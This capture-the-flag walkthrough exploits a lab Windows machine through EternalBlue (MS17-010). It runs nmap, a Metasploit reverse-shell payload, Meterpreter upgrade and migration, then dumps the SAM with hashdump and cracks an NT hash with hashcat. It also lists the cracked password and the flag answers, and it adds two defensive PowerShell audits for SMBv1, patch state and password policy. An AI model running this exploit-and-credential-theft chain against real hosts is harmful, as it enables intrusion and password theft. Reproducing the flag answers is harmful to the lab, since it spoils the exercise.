Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
Scan the machine:
nmap -A -T4 10.10.92.237
We can see it's a Windows machine named Jon-PC, and three ports below 1000 are open.
Nmap's vuln scripts also report a number of findings, all of them SMB related:
nmap --script=vuln -T4 10.10.92.237
The answer is CVE-2017-0143 (MS17-010).
Start Metasploit and use the module exploit/windows/smb/ms17_010_eternalblue:
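The scan above tells an attacker the host is exposed; the defender's question is the mirror image: is SMBv1 still on, and is MS17-010 installed? The following PowerShell audit is an added example and is not part of the original write-up. It reads the LanmanServer `SMB1` registry value (honoured from Windows 7 onward) and checks installed hotfixes with `Get-HotFix`. The KB identifiers are placeholders that must be filled in from the MS17-010 bulletin for the host's OS build, and the script assumes an elevated PowerShell session.

```powershell
# Added example (not from the original write-up): audit a Windows host for the
# exposure used above, i.e. SMBv1 reachable on a machine missing MS17-010.
# Assumptions: run from an elevated PowerShell; the KB list is a placeholder
# that must be filled from the MS17-010 bulletin for the host's OS build.

function Get-Smb1State {
    # SMB1 = 0 under LanmanServer\Parameters disables the SMBv1 server.
    # A missing value means the OS default, which on Windows 7 / 2008 R2 is enabled.
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $value  = (Get-ItemProperty -Path $params -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $value) { return 'enabled (OS default, value not set)' }
    if ($value -eq 0)     { return 'disabled' }
    return 'enabled'
}

function Test-Ms17010Patch {
    param([string[]] $KbIds)
    # Get-HotFix lists installed updates by KB id; return the first match or $null.
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $KbIds) {
        if ($installed -contains $kb) { return $kb }
    }
    return $null
}

# Placeholder: replace with the KB numbers for this OS from the MS17-010 bulletin.
$ms17010Kbs = @('KB_PLACEHOLDER_SECURITY_ONLY', 'KB_PLACEHOLDER_MONTHLY_ROLLUP')

$smb1  = Get-Smb1State
$patch = Test-Ms17010Patch -KbIds $ms17010Kbs

Write-Output "Host:           $env:COMPUTERNAME"
Write-Output "SMBv1 server:   $smb1"
Write-Output "MS17-010 patch: $(if ($patch) { "installed ($patch)" } else { 'NOT FOUND' })"

if ($smb1 -ne 'disabled' -and -not $patch) {
    Write-Warning 'Unpatched host with SMBv1 enabled: the state the vuln scan above reports as vulnerable.'
}

# Remediation (uncomment to apply), followed by a reboot: disable the SMBv1 server.
# Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name SMB1 -Value 0 -Type DWord
# On Windows 8 / Server 2012 and later the SmbShare module offers the same switch:
# Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
```

The external counterpart of this check is the `nmap --script=vuln` run shown on the page, whose `smb-vuln-ms17-010` script reports the same condition from the network side; the registry check is what confirms remediation on the host itself, since the patch alone leaves SMBv1 listening.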
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
Now we need to set RHOSTS (the target) and the payload:
set RHOSTS 10.10.92.237
set payload windows/x64/shell/reverse_tcp
exploit
If it fails, try rebooting the target machine, or set LHOST to your OpenVPN (tun0) IP so the reverse connection can reach you.
Background the session with `background`.
Now we need to convert the plain shell into a Meterpreter session:
use post/multi/manage/shell_to_meterpreter
set session 1
exploit
This creates a new session 2; interact with it:
sessions -i 2
Now we have NT AUTHORITY\SYSTEM privileges.
Background this session too.
First, let's list all of the processes running on the system.
Just because we have SYSTEM-level privileges doesn't mean our process does! We'll have to migrate to a new process that does have those permissions.
Once a process is found, type migrate PROCESSID, where PROCESSID is the ID of the process we are migrating to.
This migration may fail; migrating processes is realistically only successful about 25% of the time.
Dump all of the password hashes:
hashdump
Copy the NT hash (the fourth field of the hashdump line, user:RID:LM:NT:::) to a file:
echo ffb43f0de35be4d9917ac0cc8ad57f8d > pass.txt
Windows stores the password as an NTLM (NT) hash, which is hashcat hash mode 1000:
hashcat -a 0 -m 1000 pass.txt /usr/share/wordlists/rockyou.txt --show
Note that --show only prints results already in the potfile; run the command once without --show to crack the hash, then with --show to display it.
The password is alqfna22.
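The hash fell in seconds because NT hashes are unsalted and the password was an 8-character string present in rockyou; the only lever a defender has against an offline crack is the password policy that was in force when the password was set. The following PowerShell audit is an added example, not part of the original write-up: it exports the local security policy with `secedit`, reads the password and lockout settings, and checks the `NoLMHash` LSA value. It assumes an elevated session, and the thresholds it flags against are chosen for this example rather than taken from the page.

```powershell
# Added example (not from the original write-up): check whether a host's local
# password policy and hash-storage settings would make a dumped NT hash as easy
# to recover as the one above (an 8-character password found in rockyou).
# Assumptions: elevated PowerShell; the thresholds below are chosen for this
# example, not taken from the write-up.

function Get-LocalPasswordPolicy {
    # secedit exports the local security policy as an INI-style file whose
    # [System Access] section holds the password and lockout settings.
    $cfg = Join-Path $env:TEMP 'secpol_export.inf'
    secedit /export /cfg $cfg /quiet | Out-Null
    $policy = @{}
    foreach ($line in Get-Content $cfg) {
        if ($line -match '^\s*(MinimumPasswordLength|PasswordComplexity|LockoutBadCount)\s*=\s*(\d+)') {
            $policy[$matches[1]] = [int] $matches[2]
        }
    }
    Remove-Item $cfg -ErrorAction SilentlyContinue
    return $policy
}

function Get-NoLmHashSetting {
    # NoLMHash = 1 stops Windows storing the much weaker LM hash next to the NT hash.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    if ($null -eq $lsa -or $null -eq $lsa.NoLMHash) { return 0 }
    return [int] $lsa.NoLMHash
}

$policy   = Get-LocalPasswordPolicy
$noLmHash = Get-NoLmHashSetting
$findings = @()

if ($policy['MinimumPasswordLength'] -lt 14) {
    $findings += "MinimumPasswordLength is $($policy['MinimumPasswordLength']) (example threshold: 14)"
}
if ($policy['PasswordComplexity'] -ne 1) { $findings += 'Password complexity is not enforced' }
if (-not $policy['LockoutBadCount'])     { $findings += 'No lockout threshold: online guessing is unthrottled' }
if ($noLmHash -ne 1)                     { $findings += 'NoLMHash is not 1: LM hashes may be stored in the SAM' }

if ($findings.Count -eq 0) {
    Write-Output 'No password policy findings'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
}
```

Lockout thresholds only throttle online guessing; once the SAM has been dumped, as on this box, nothing on the host limits the attacker's rate, which is why minimum length matters more than any other setting here.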
In Meterpreter, search is a very useful command for locating files:
search -f *flag*
cat C:/flag1.txt
| Flag | flag1.txt |
|---|---|
| Answer | flag{access_the_machine} |
cat C:/Windows/System32/config/flag2.txt
| Flag | flag2.txt |
|---|---|
| Answer | flag{sam_database_elevated_access} |
cat C:/Users/Jon/Documents/flag3.txt
| Flag | flag3.txt |
|---|---|
| Answer | flag{admin_documents_can_be_valuable} |